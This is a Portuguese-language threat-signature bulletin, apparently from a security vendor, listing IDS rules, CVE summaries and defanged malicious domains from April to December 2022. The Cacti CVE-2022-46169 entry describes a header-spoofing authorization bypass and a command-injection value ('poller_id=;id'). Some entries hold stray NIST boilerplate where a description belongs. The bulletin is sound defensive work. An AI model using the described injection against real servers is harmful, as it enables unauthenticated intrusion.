Relatório de Assinaturas
de Ameaças

Aqui você encontra informações sobre as últimas
assinaturas de ameaças geradas por nossos especialistas.

Dezembro/22

CVE-2022-26259

A buffer over flow in Xiongmai DVR devices NBD80X16S-KL, NBD80X09S-KL, NBD80X08S-KL, NBD80X09RA-KL, AHB80X04R-MH, AHB80X04R-MH-V2, AHB80X04-R-MH-V3, AHB80N16T-GS, AHB80N32F4-LME, and NBD90S0VT-QW allows attackers to cause a Denial of Service (DoS) via a crafted RSTP request.

 

Novos registros de AppleJeus (Malware recente do Lazarus)

 

 2041658 – ET TROJAN Observed DNS Query to AppleJeus Domain (strainservice .com) (emerging-trojan.rules)
 2041659 – ET TROJAN Observed DNS Query to AppleJeus Domain (telloo .io) (emerging-trojan.rules)
 2041660 – ET TROJAN Observed DNS Query to AppleJeus Domain (wirexpro .com) (emerging-trojan.rules)
 2041661 – ET TROJAN Observed DNS Query to AppleJeus Domain (rebelthumb .net) (emerging-trojan.rules)
 2041662 – ET TROJAN Observed DNS Query to AppleJeus Domain (oilycargo .com) (emerging-trojan.rules)
 2041663 – ET TROJAN Observed DNS Query to AppleJeus Domain (bloxholder .com) (emerging-trojan.rules)
 2041664 – ET TROJAN Win32/AppleJeus CnC Checkin (POST) (emerging-trojan.rules)

 

CVE-2022-40259

AMI MegaRAC Redfish Arbitrary Code Execution

CVE-2022-2827
AMI MegaRAC User Enumeration Vulnerability
(Ambas essas CVES são relacionadas a exploits do protocolo Redfish da Cisco)
CVE-2022-46169 (Injeções de comandos via acesso não autorizado no Cacti)

Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device – Uptime` or `Device – Polling Time`. This command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_…` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.

Novembro/22

CVE-2022-31898

    gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.

CVE-2022-3602

    A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).

Contribuições com IPs em Bad Reputation.

    Adições de IPs com má reputação em mais de 200 grupos de portas.

Outubro/22

CVE-2022-36635

2039129 – ET EXPLOIT ZKBioSecurity SQL Injection Attempt (CVE-2022-36635) (emerging-exploit.rules)

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

Encontrada uma vulnerabilidade de tipo SQl Injection em uma plataforma de segurança fisica (elevadores, controles de acesso etc) conhecida como ZKSecurity Bio v4.1.3

CVE-2022-41352

 2039141 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M1 (emerging-exploit.rules)

 2039142 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M2 (emerging-exploit.rules)

 2039143 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M4 (emerging-exploit.rules)

 2039144 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M3 (emerging-exploit.rules)

 2039145 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M6 (emerging-exploit.rules)

 2039146 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M5 (emerging-exploit.rules)

 2039147 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M7 (emerging-exploit.rules)

 2039148 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M8 (emerging-exploit.rules)

An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.

Uma vulnerabilidade encontrada no Zimbra, onde o atacante poderia subir um arquivo arbitrario com cpioloophole o que levava a acessos a outras contas

CVE-2022-30333

2039149 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M1 (emerging-exploit.rules)

 2039150 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M2 (emerging-exploit.rules)

By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.

CVE-2022-40684

2039173 – ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684) (emerging-web_server.rules)

 2039419 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – SSH Key Upload (CVE-2022-40684) (emerging-web_server.rules)

 2039420 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – Admin Details Leaked (CVE-2022-40684) (emerging-web_server.rules)

An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

Uma falha de bypass encontrada no sistema da Fortinet (FortiOS versão 7.2)

CVE-2022-42889

 2039464 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039465 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

 2039466 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039467 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

 2039468 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039469 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

 2039470 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039471 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.

CVE-2022-22241

2039591 – ET TROJAN Potential Juniper Phar Deserialization RCE Attempt (CVE-2022-22241) (emerging-trojan.rules)

An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

Uma vulnerabilidade encontrada nos componentes no sistema Junos OS, resultava em um ataque não autenticado usando POST e levava a arquivos locais.

CVE-2022-22244

2039592 – ET TROJAN Potential Juniper XPATH Injection Attempt (CVE-2022-22244) (emerging-trojan.rules)

By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.

CVE-2022-22242

2039598 – ET TROJAN Potential Juniper Reflected XSS Attempt (CVE-2022-22242) (emerging-trojan.rules)

A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim’s browser in the context of their session within J-Web. This issue affects Juniper Networks Junos OS all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.

Vulnerabilidade de XSS encontrada no Junos OS

CVE-2022-22245

2039599 – ET TROJAN Potential Juniper Path Traversal RCE Attempt (CVE-2022-22245) (emerging-trojan.rules)

A Path Traversal vulnerability in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to upload arbitrary files to the device by bypassing validation checks built into Junos OS. The attacker should not be able to execute the file due to validation checks built into Junos OS. Successful exploitation of this vulnerability could lead to loss of filesystem integrity. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

CVE-2022-22246

 2039600 – ET TROJAN Potential Juniper PHP Local File Inclusion Attempt (CVE-2022-22246) (emerging-trojan.rules)

A PHP Local File Inclusion (LFI) vulnerability in the J-Web component of Juniper Networks Junos OS may allow a low-privileged authenticated attacker to execute an untrusted PHP file. By chaining this vulnerability with other unspecified vulnerabilities, and by circumventing existing attack requirements, successful exploitation could lead to a complete system compromise. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

Setembro/22

ATTACK_RESPONSE Nishang Invoke-PowerShellTcp -

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.

Nishang é um framework e uma coleção de scripts e payloads que habilitam o PowerShell para acesso (ferramenta especialmente usada para testes de invasão e red team)

ET MALWARE TA453/APT35 HYPERSCRAPE

Adicionada novas assinaturas do ET MALWARE TA453/APT35 HYPERSCRAPE no Blockbit UTM e disponibilizado em nosso repositório oficial.

Hyperscrape: Os hackers o executam em suas próprias máquinas para baixar e-mails das caixas de entrada das vítimas usando credenciais adquiridas anteriormente e excluir a atividade do aplicativo.

OSX/SHLAYER

Trojan:OSX/Shlayer identifies a file that appears to be an update for a popular media player, but when launched will instead run scripts that download other unwanted programs onto the computer.

OSX/SHLAYER é um tipo de trojan que costuma se identificar como um reprodutor de media popular, porém ao ser rodado ele trará uma série de scripts que irão baixar programas indesejados no computador.

Confucious APT

Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.

Confucius é um grupo de cyber espionagem que tem como alvo primário militares, personalidades importantes, organizações governamentais no sul asiático desde 2013. Possuem certa similaridade com o grupo Patchwork.

Agosto/22

VMware Authentication Bypass

O VMware Workspace ONE Access, o Identity Manager e o vRealize Automation contêm uma vulnerabilidade de desvio de autenticação que afeta os usuários do domínio local. Um agente mal-intencionado com acesso de rede à interface do usuário pode obter acesso administrativo sem a necessidade de autenticação.

 

Assinatura gerada pela Blockbit:

sid: 2038475
ET EXPLOIT Attempted VMware Authentication Bypass (CVE-2022-31656) (emerging-exploit.rules)
 
Facebook Credential Theft

A assinatura corresponde a uma landing page do Facebook com capacidade de roubar credenciais de acesso.
Landing Page 2022-07-29 (emerging-current_events.rules)

 

Assinatura gerada pela Blockbit:

sid: 2037869
ET CURRENT_EVENTS Facebook Credential Theft Landing Page 2022-07-29 (emerging-current_events.rules)

ET TROJAN Lazarus APT

O Grupo Lazarus tem fortes ligações com a Coreia do Norte.  A Coreia do Norte se beneficia da realização de operações cibernéticas porque pode apresentar uma ameaça assimétrica com um pequeno grupo de operadores, especialmente para a Coreia do Sul.

 

Assinatura gerada pela Blockbit:

sid: 2037957
ET TROJAN Lazarus APT Related Activity (GET) (emerging-trojan.rules)
Patchwork APT Related Activity M3 (POST)

Este grupo de espionagem cibernética tem como alvo vários diplomatas e economistas de alto nível que têm relações internacionais com a China, usando um conjunto personalizado de ferramentas de ataque. Os ataques geralmente eram feitos por meio de campanha de spear phishing ou ataques de watering hole.

 

Assinatura gerada pela Blockbit:

sid: 2037963
ET TROJAN Patchwork APT Related Activity M3 (POST) (emerging-trojan.rules)
SHARPEXT CnC Domain
Assinaturas geradas pela Blockbit:
sid: 2037955
ET TROJAN SHARPEXT CnC Domain in DNS Lookup (gonamod .com) (emerging-trojan.rules)
 
sid: 2037956
ET TROJAN SHARPEXT CnC Domain in DNS Lookup (siekis .com) (emerging-trojan.rules)
Shuckworm CnC Domain

Assinaturas geradas pela Blockbit:

sid: 2038530
ET TROJAN Shuckworm CnC Domain (leonardis .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038531
ET TROJAN Shuckworm CnC Domain (destroy .asierdo .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038532
ET TROJAN Shuckworm CnC Domain (heato .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038533
ET TROJAN Shuckworm CnC Domain (motoristo .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038534
ET TROJAN Shuckworm CnC Domain (a0698649 .xsph .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038535
ET TROJAN Shuckworm CnC Domain (pasamart .ru) in DNS Lookup (emerging-trojan.rules)
TROJAN Observed DNS Query to UNC3890

Assinaturas geradas pela Blockbit:

sid: 2038558
ET TROJAN Observed DNS Query to UNC3890 Domain (pfizerpoll .com) (emerging-trojan.rules)
 
sid: 2038559
ET TROJAN Observed DNS Query to UNC3890 Domain (naturaldolls .store) (emerging-trojan.rules)
 
sid: 2038560
ET TROJAN Observed DNS Query to UNC3890 Domain (rnfacebook .com) (emerging-trojan.rules)
 
sid: 2038561
ET TROJAN Observed DNS Query to UNC3890 Domain (xxx-doll .com) (emerging-trojan.rules)
 
sid: 2038562
ET TROJAN Observed DNS Query to UNC3890 Domain (celebritylife .news) (emerging-trojan.rules)
 
sid: 2038563
ET TROJAN Observed DNS Query to UNC3890 Domain (office365update .live) (emerging-trojan.rules)
 
sid: 2038564
ET TROJAN Observed DNS Query to UNC3890 Domain (fileupload .shop) (emerging-trojan.rules)
Zimbra RCE Attempt Inbound (CVE-2022-27925)

O Zimbra Collaboration (também conhecido como ZCS) 8.8.15 e 9.0 possui a funcionalidade mboximport que recebe um arquivo ZIP e extrai arquivos dele. Um usuário autenticado com direitos de administrador tem a capacidade de fazer upload de arquivos arbitrários para o sistema, levando à travessia do diretório.


Assinatura gerada pela Blockbit:

sid: 2038504
ET EXPLOIT Possible Zimbra RCE Attempt Inbound (CVE-2022-27925) (emerging-exploit.rules)

Julho/22

Exploit VMware


A vulnerabilidade é uma execução remota de código (RCE) crítica (CVSS: 9.8), que afeta o VMware Workspace ONE Access e o VMware Identity Manager, dois produtos de software amplamente utilizados.

 

Assinaturas geradas pela Blockbit

Sid:2035876
VMWare Server-side Template Injection RCE (CVE-2022-22954)
 
Sid:2035874
VMWare Server-side Template Injection RCE (CVE-2022-22954)

Sid:2035875
VMWare Server-side Template Injection RCE (CVE-2022-22954)
Exploit Adobe ColdFusion 11

Assinaturas geradas pela Blockbit

sid:2036731Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (GET) CVE-2018-15957

sid:2036732
Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (POST) CVE-2018-15957

Apache log4j RCE Attempt - HTTP URI Obfuscation

Assinatura gerada pela Blockbit

sid:2037046
Possible Apache log4j RCE Attempt – HTTP URI Obfuscation (CVE-2021-44228) (Inbound)
 
sid:2037047
Possible Apache log4j RCE Attempt – HTTP URI Obfuscation (CVE-2021-44228) (Outbound)
Exploit Attempted Mitel MiVoice Connect Data Validation RCE Inbound

Um ataque de ransomware foi implantado contra um alvo sem nome, usando o dispositivo VoIP da Mitel como ponto de entrada.

Assinatura gerada pela Blockbit

sid:2037121
Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
Exploit Kramer VIAware
Todas as versões testadas do KramerAV VIAWare permitem o escalonamento de privilégios por meio da configuração incorreta do sudo, possibilitando a execução de vários comandos perigosos, incluindo unzip, systemctl e dpkg.
 
Assinatura gerada pela Blockbit:
sid:2036738
Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)
Exploit Zyxel NWA-1100-NH

Uma vulnerabilidade de injeção de comando na interface da web do firmware Zyxel NWA-1100-NH pode permitir que um invasor execute comandos arbitrários do sistema operacional do dispositivo.

 

Assinatura gerada pela Blockbit

sid:2036737
Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)
Vulnerabilidade Follina

Considerada de alta gravidade, a vulnerabilidade em questão afeta a Ferramenta de Diagnóstico da Microsoft (MSDT), que pode ser explorada por cibercriminosos para a execução de códigos maliciosos remotamente.

Assinaturas geradas pela Blockbit

sid:2036726
Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)
 
sid:2037083
Possible Microsoft Support Diagnostic Tool Exploitation Inbound

Junho/22

Exploit dotCMS

Quando arquivos são carregados no dotCMS por meio de um API de conteúdo, o dotCMS grava o arquivo em um diretório temporário.  No caso desta vulnerabilidade, o dotCMS não limpa o nome do arquivo passado por meio do cabeçalho de solicitação de várias partes e, portanto, não limpa o nome do arquivo temporário.

 

Assinaturas geradas pela Blockbit

sid:2036457

dotCMS Arbitrary File Upload Attempt M1

 
sid:2036458
dotCMS Arbitrary File Upload Attempt M2
Exploit Zyxel Firewalls

Essa vulnerabilidade afeta firewalls Zyxel que suportam Zero Touch Provisioning (ZTP), que inclui as séries ATP, VPN e USG FLEX (incluindo USG20-VPN e USG20W-VPN). A vulnerabilidade, identificada como CVE-2022-30525, permite que um invasor remoto e não autenticado consiga a execução de código arbitrário como o usuário no dispositivo afetado.

 

Assinatura gerada pela Blockbit

sid:2036596
[Rapid7] Zyxel ZTP setWanPortSt mtu Parameter Exploit Attempt (CVE 2022-30525)

Exploit Apache CouchDB

Recentemente, o Apache emitiu um aviso de risco para a vulnerabilidade de execução remota de código do Apache CouchDB, o número da vulnerabilidade é CVE-2022-24706 e a gravidade é crítica.

 

No Apache CouchDB anterior à versão 3.2.2, um invasor pode acessar uma instalação padrão inadequadamente protegida sem autenticação e obter privilégios de administrador.

 

Assinatura gerada pela Blockbit

sid:2036650
Default Apache CouchDB Erlang Cookie Observed (CVE-2022-24706)
Exploit Telesquare SDT-CW3B1 1.1.0

O Telesquare SDT-CW3B1 1.1.0 é afetado por uma vulnerabilidade de injeção de comando do sistema operacional que permite que um invasor remoto execute comandos do sistema operacional sem qualquer autenticação.

 

Assinatura gerada pela Blockbit

sid:2036663
Telesquare SDT-CW3B1 1.1.0 – OS Command Injection (CVE-2021-46422)
Exploit SolarView Compact
Foi descoberto que o SolarView Compact ver.6.00 contém uma vulnerabilidade de injeção de comando via conf_mail.php.
 
Assinatura gerada pela Blockbit:
sid:2036649
SolarView Compact Command Injection Inbound (CVE-2022-29303)
Exploit ThinkPHP

Considerando o impacto potencialmente extenso dessa vulnerabilidade, os usuários são aconselhados a ficar atentos e tomar as medidas necessárias para se proteger.

 

Assinaturas geradas pela Blockbit

sid:2036598
Attempted ThinkPHP < 5.2.x RCEInbound (CVE-2018-20062)
 
sid:2036599
Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)
Exploit Sophos Firewall

Uma vulnerabilidade de desvio de autenticação no Portal do Usuário e no Webadmin permite que um invasor remoto execute código no Sophos Firewall na versão v18.5 MR3 e em versões anteriores.

 

Assinaturas geradas pela Blockbit

sid:2036548
Sophos Firewall Authentication Bypass (CVE-2022-1040)
 
sid:2036549
Sophos Firewall Authentication Bypass (CVE-2022-1040) Server Response M1
 
sid:2036550
Sophos Firewall Authentication Bypass (CVE-2022-1040) Server Response M2

Maio/22

Exploit VMware

A vulnerabilidade é uma execução remota de código (RCE) crítica (CVSS: 9.8), que afeta o VMware Workspace ONE Access e o VMware Identity Manager, dois produtos de software amplamente utilizados.

 

Assinaturas geradas pela Blockbit

Sid:2035876
VMWare Server-side Template Injection RCE (CVE-2022-22954)
 
Sid:2035874
VMWare Server-side Template Injection RCE (CVE-2022-22954)

Sid:2035875
VMWare Server-side Template Injection RCE (CVE-2022-22954)
Exploit F5 BIG-IP

Uma vulnerabilidade F5 BIG-IP recentemente divulgada foi usada em ataques destrutivos, tentando apagar o sistema de arquivos de um dispositivo e tornar o servidor inutilizável.

 

Assinaturas geradas pela Blockbit

sid:2036546
F5 BIG-IP iControl REST Authentication Bypass (CVE 2022-1388) M1
 
sid:2036547
F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE 2022-1388)
Nginx Zero-Day

Um problema nginx Zero-Day RCE foi identificado na implementação do nginx LDAP-auth daemon, que vazou brevemente.

 

Assinatura gerada pela Blockbit

sid:2035897
Possible NGINX Reference LDAP Query Injection Attack
Exploit Redis RCE Attempt

Foi descoberto que o Redis, um banco de dados de chave-valor persistente, devido a um problema de empacotamento, é propenso a escapar do sandbox lua (específico do Debian), o que poderia resultar na execução remota de código.

 

Assinaturas geradas pela Blockbit

sid:2035718
Redis RCE Attempt (CVE-2022-0543) M1
 
sid:2035719
Redis RCE Attempt (CVE-2022-0543) M2
 
sid:20357120
Possible Redis RCE Attempt – Dynamic Importing of liblua
Exploit Gitlab: Tentativa de login com senha hardcoded
Uma senha hardcoded foi definida para contas utilizando um provedor OmniAuth (e.g. OAuth, LDAP, SAML) nas versões GitLab CE/EE 14.7 até 14.7.7, 14.8 até 14.8.5 e 14.9 até 14.9.2, permitindo que atacantes tomassem tais contas.
 
Assinaturas geradas pela Blockbit:
 
sid: 2035751
Gitlab Login Attempt with hard-coded password (CVE-2022-1162)
 
sid: 2035750
Gitlab Login Attempt with hard-coded password (CVE-2022-1162)
Exploit Psychic Signatures em Java

Trata-se de uma vulnerabilidade de desvio de assinatura digital em Java que se deve à má implementação do Algoritmo de Assinatura Digital de Curva Elíptica em Java. Essa vulnerabilidade de desvio de assinatura faz com que o Java aceite uma assinatura em branco como uma assinatura válida.

 

Assinaturas geradas pela Blockbit

sid:2036377
[ConnectWise CRU] Java ECDSA (Psychic) TLS Signature (CVE-2022-21449)
 
sid:2036392
[ConnectWise CRU] Java ECDSA (Psychic) Signed JWT Bypass (CVE-2022-21449)

Abril/22

KwampirsRAT

O Kwampirs é um trojan de acesso remoto capaz de obter acesso a máquinas e redes.

Assinatura gerada pela Blockbit

Sid 2023595 TROJAN Trojan.Kwampirs Outbound GET request

TrickBot

O Trickbot surgiu como um trojan bancário e se tornou um malware poderoso com capacidade para roubar dados, lançar ataques de ransomware e destruir arquivos.

Assinaturas geradas pela Blockbit

Sid 2023727 TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TrickBot CnC)

Sid 2033659 TROJAN Win32/TrickBot CnC Initial Checkin M2

Loki Locker

O Loki Locker se trata de uma ameaça capaz de infectar sistemas, criptografar arquivos armazenados e extorquir dinheiro de suas vítimas.

Assinatura gerada pela Blockbit

Sid 2035510 MALWARE Loki Locker Ransomware User-Agent

DarkHotel

O DarkHotel é uma campanha de espionagem que utiliza certificados falsos na rede Wi-Fi para ludibriar executivos hospedados em hotéis de luxo.

Assinatura gerada pela Blockbit

Sid 2021609 TROJAN Possible DarkHotel Landing M1

CaddyWiper

O CaddyWiper é um software malicioso projetado para limpar os dados armazenados em dispositivos infectados. Embora também seja do tipo wiper, o CaddyWiper não possui semelhanças significativas com o HermeticWiper ou o IsaacWiper.

Assinatura gerada pela Blockbit

Sid 59268 MALWARE-OTHER Win.Trojan.CaddyWiper download attempt Rule

Mustang Panda

Grupo de cibercriminosos responsáveis por ataques APT (Advanced Persistent Threat).

Assinaturas geradas pela Blockbit

Sid 2035551 TROJAN Suspected Mustang Panda APT Related Activity (GET)

Sid 2035552 TROJAN Suspected Mustang Panda APT Related Activity (GET)

Scarab

O Scarab se trata de um tipo de ransomware que se infiltra no sistema e para roubar vários dados.

Assinatura gerada pela Blockbit

Sid 2035557 TROJAN Scarab APT Related Domain in DNS Lookup

Verblecon

Verblecon é uma ameaça que funciona como um carregador, lançando outros conteúdos maliciosos nos dispositivos infectados por ele.

Assinaturas geradas pela Blockbit

Sid 2035659 TROJAN Trojan.Verblecon User Agent Observed

Sid 2035660 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (gaymers .ax)

Sid 2035661 TROJAN Observed Trojan.Verblecon Related Domain (gaymers .ax in TLS SNI)

Sid 2035662 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (jonathanhardwick .me)

Sid 2035663 TROJAN Observed Trojan.Verblecon Related Domain (jonathanhardwick .me in TLS SNI)

